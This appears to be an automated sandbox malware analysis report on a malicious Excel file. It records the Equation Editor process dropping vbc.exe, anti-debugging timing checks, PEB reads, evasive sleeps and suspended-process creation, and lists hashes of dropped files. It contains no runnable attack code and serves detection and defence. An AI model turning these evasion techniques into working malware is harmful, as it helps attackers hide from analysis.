Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000002792DD second address: 00000000002792DD instructions:

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 6_2_00275798 rdtsc

6_2_00275798

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1984

Thread sleep time: -240000s >= -30000s

Jump to behavior

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 6_2_00275798 rdtsc

6_2_00275798

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe	Code function: 6_2_0027352B mov eax, dword ptr fs:[00000030h]		6_2_0027352B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00276E4F mov eax, dword ptr fs:[00000030h]		6_2_00276E4F

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'

Jump to behavior

Source: vbc.exe, 00000006.00000002.2355993014.0000000000890000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: vbc.exe, 00000006.00000002.2355993014.0000000000890000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000006.00000002.2355993014.0000000000890000.00000002.00000001.sdmp	Binary or memory string: !Progman

ID:	457648
Product:	CloudBasic
Start time:	07:24:22
Start date:	02.08.2021
Sample:	DB_aabbbkdjdhgdghjdkjdggdghh0x06E5.xlsx
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	ab57abd998267541ce6d27ecf2b85ba5
SHA1:	4840478268380cf80e55d5ca019d108236d100a6
SHA256:	6af62a337c410357a5f49294e98ead83092c6a1d3b73e58c2f56ea5abfdd745e
Filetype:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	9318CD06A9A0B788DC043A63C97D4FCE	A296EA3E1CF6D41F9D059D7D6E5058882B03161A	7AD18B09938D40E8EC342EE6BEE6B190A986FFEDCE7567A638B8D25B4098CB69
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\23E0E888.png	PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced	9513E5EF8DDC8B0D9C23C4DFD4AEECA2	E7FC283A9529AA61F612EC568F836295F943C8EC	88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2459FEE9.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3	971312D4A6C9BE9B496160215FE59C19	D8AA41C7D43DAAEA305F50ACF0B34901486438BE	4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\31B846BE.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3	971312D4A6C9BE9B496160215FE59C19	D8AA41C7D43DAAEA305F50ACF0B34901486438BE	4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3F47FD52.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	62E3F94AAC964ECB9508782BDAC02CD0	BA8AE2F6307F62243DED764BA344536FD28FEC07	A3CEB693C1517EE4354D33B61AAD28FF47F05285AB12D3C3B0472EE6D8DFDCCC
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3FB96E45.png	PNG image data, 687 x 111, 8-bit colormap, non-interlaced	A5D66CCBEE7946308A985B0FA9CC74F7	D86FFD2A310B16C59849B8E574B673E36643FDDF	6B8E5D3AFEA87B138C1084837085EDFF6D74B5001E92897CE6FF087058204B28
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\48845B4D.png	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced	208FD40D2F72D9AED77A86A44782E9E2	216B99E777ED782BDC3BFD1075DB90DFDDABD20F	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\542157E3.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3	738BDB90A9D8929A5FB2D06775F3336F	6A92C54218BFBEF83371E825D6B68D4F896C0DCE	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\559E50EA.png	PNG image data, 687 x 111, 8-bit colormap, non-interlaced	A5D66CCBEE7946308A985B0FA9CC74F7	D86FFD2A310B16C59849B8E574B673E36643FDDF	6B8E5D3AFEA87B138C1084837085EDFF6D74B5001E92897CE6FF087058204B28
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\67F6771.png	PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced	9513E5EF8DDC8B0D9C23C4DFD4AEECA2	E7FC283A9529AA61F612EC568F836295F943C8EC	88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6D991930.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3	738BDB90A9D8929A5FB2D06775F3336F	6A92C54218BFBEF83371E825D6B68D4F896C0DCE	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\91669DF.png	PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced	63A6CB15B2B8ECD64F1158F5C8FBDCC8	8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6	AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\97BC617C.png	PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced	63A6CB15B2B8ECD64F1158F5C8FBDCC8	8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6	AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\98E3C7D6.png	PNG image data, 779 x 181, 8-bit colormap, non-interlaced	871E67261292737F85DEE051B2EF5B1A	3108E69E8BEABB0CD820696E9F22889B5E7D3224	F35AAA75635EB695B2DA69C932ECBD5AD4DB934EBFB0433DAC7913C2B7551A6A
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A298892B.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	70A88C1226FC889154191297A4A09A2F	03234CA14006B1F4C1A45A06BD4BE69E7B2B70EC	BEE993BAEB024759B6F3DB327531AAB552A87B79B3FE112E311AEF9D9FE0A3CF
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BB193A54.png	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced	208FD40D2F72D9AED77A86A44782E9E2	216B99E777ED782BDC3BFD1075DB90DFDDABD20F	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DB194BA7.png	PNG image data, 779 x 181, 8-bit colormap, non-interlaced	871E67261292737F85DEE051B2EF5B1A	3108E69E8BEABB0CD820696E9F22889B5E7D3224	F35AAA75635EB695B2DA69C932ECBD5AD4DB934EBFB0433DAC7913C2B7551A6A
C:\Users\user\Desktop\~$DB_aabbbkdjdhgdghjdkjdggdghh0x06E5.xlsx	data	96114D75E30EBD26B572C1FC83D1D02E	A44EEBDA5EB09862AC46346227F06F8CFAF19407	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
C:\Users\Public\vbc.exe	PE32 executable (GUI) Intel 80386, for MS Windows	9318CD06A9A0B788DC043A63C97D4FCE	A296EA3E1CF6D41F9D059D7D6E5058882B03161A	7AD18B09938D40E8EC342EE6BEE6B190A986FFEDCE7567A638B8D25B4098CB69

Windows Analysis Report DB_aabbbkdjdhgdghjdkjdggdghh0x06E5.xlsx

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs